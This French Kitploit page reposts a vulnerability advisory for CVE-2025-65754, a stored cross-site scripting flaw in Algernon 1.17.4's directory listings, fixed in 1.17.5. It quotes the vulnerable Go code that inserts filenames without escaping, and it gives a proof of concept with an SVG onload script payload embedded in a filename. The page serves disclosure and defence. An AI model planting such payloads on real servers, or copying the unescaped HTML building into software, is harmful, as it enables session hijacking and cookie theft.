Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-65754 — Algernon v1.17.4 est affecté par une vulnérabilité de Cross-Site Scripting (XSS) qui permet à des attaquants d'exécuter du code arbitraire via une charge utile malveillante injectée dans un nom de fichier. | Kitploit
Outils/GitHubGitHub/bnyt7/cve-2025-65754
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubbnyt7/cve-2025-65754

CVE-2025-65754

Algernon v1.17.4 est affecté par une vulnérabilité de Cross-Site Scripting (XSS) qui permet à des attaquants d'exécuter du code arbitraire via une charge utile malveillante injectée dans un nom de fichier.

Voir le dépôt
il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-65754 : XSS stocké dans Algernon 1.17.4

Description

Algernon v1.17.4 est affecté par une vulnérabilité de Cross-Site Scripting (XSS) qui permet à des attaquants d'exécuter du code arbitraire via une charge utile malveillante dans un nom de fichier.

  • Projet affecté : Algernon - 1.17.4
  • Mainteneur du projet : Alexander F. Rødseth (xyproto)
  • Type de vulnérabilité : Cross-Site Scripting (XSS)
  • Vecteur d'attaque : Un attaquant pourrait télécharger des fichiers avec des noms malveillants pour modifier le contenu d'un site web ou voler des cookies pour détourner des sessions.

Certaines variables n'étaient pas nettoyées. Par exemple :

engine/dirhandler.go lignes 80-108

root@kitploit:~
filename := item.Name()  // Get filename from filesystem
// ...
buf.WriteString(themes.HTMLLink(filename, URLpath, ac.fs.IsDir(fullFilename)))

themes/html.go lignes 124-132

root@kitploit:~
func HTMLLink(text, url string, isDirectory bool) string {
    if isDirectory {
        text += "/"
        url += "/"
    }
    return "<a href=\"/" + url + "\">" + text + "</a><br>"
    // 'text' (filename) is inserted directly without HTML escaping
}

Les noms de fichiers du système de fichiers sont insérés directement dans le HTML sans échappement dans les listes de répertoires.

PoC

root@kitploit:~
$ algernon -v                                  
Algernon 1.17.4

Dans un répertoire, créez des fichiers avec des charges utiles XSS comme noms.

root@kitploit:~
# XSS Payload 1: Simple alert
$touch "test.txt"

# XSS Payload 2: Event handler in filename
$touch "document<svg onload=alert(document.domain)>.svg"

Dans le même répertoire, lancez l'application.

root@kitploit:~
algernon
root@kitploit:~
Server directory:       .
Server address:         :3000
Database:               Bolt (/tmp/algernon.db)
Cache mode:             On
Cache size:             1048576 bytes
TLS certificate:        cert.pem
TLS key:                key.pem
Request limit:          10/sec per visitor
Large file threshold:   44040192 bytes
Large file timeout:     10 sec
INFO[0000] Serving HTTP/2 on https://localhost:3000/    
ERRO[0000] open cert.pem: no such file or directory. Not serving HTTP/2. 
INFO[0000] Use the -t flag for serving regular HTTP.    
INFO[0000] Serving HTTP on http://localhost:3000/      

Visitez l'URL suivante, une alerte apparaîtra.

Alerte XSS avec onerror

Alerte XSS avec emplacement du document

Fichiers

Ce problème a maintenant été corrigé dans la v1.17.5.

Références

  • https://algernon.roboticoverlords.org/
  • https://github.com/xyproto/algernon/releases/tag/v1.17.5
  • https://github.com/xyproto/algernon/commit/cd8832014a624a9aeab60566434c3344135e23f8

Découvreur : Benoit H. (Bnyt7)

Télécharger l’outil